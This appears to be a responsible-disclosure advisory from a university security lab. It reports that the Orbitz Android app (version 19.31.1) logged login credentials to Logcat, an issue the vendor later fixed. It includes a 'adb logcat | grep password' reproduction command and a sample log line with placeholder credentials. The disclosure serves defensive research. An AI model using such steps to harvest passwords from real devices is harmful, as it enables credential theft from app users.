Security Bug in Orbitz Android App
Sep 16th, 2019
- # Exploit Title: Orbitz Android App - Username/Password Logging
- # Application: Orbitz
- # Version: 19.31.1
- # Software Link: https://play.google.com/store/apps/details?id=com.orbitz
- # Company: Orbitz
- # Installs: 1,000,000+
- # Impact: Looking at the output of Logcat, hackers can get username and password of Orbitz
- # Category: Mobile Apps
- # Tested on: Android 9
- Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of Orbitz, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
- ---Vendor feedback---
- After reporting, the vendor has quickly fixed this problem and released a new version.
- 1. Try to login with Orbitz, entering username and password
- 2. Search password in Logcat
- $ adb logcat | grep 'password'
- 08-06 18:31:28.036 6213 6294 D OkHttp : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1
- Jaeho Lee(Jaeho.Lee@rice.edu)
- Rice Computer Security Lab
- Rice University
Please, Sign In to add comment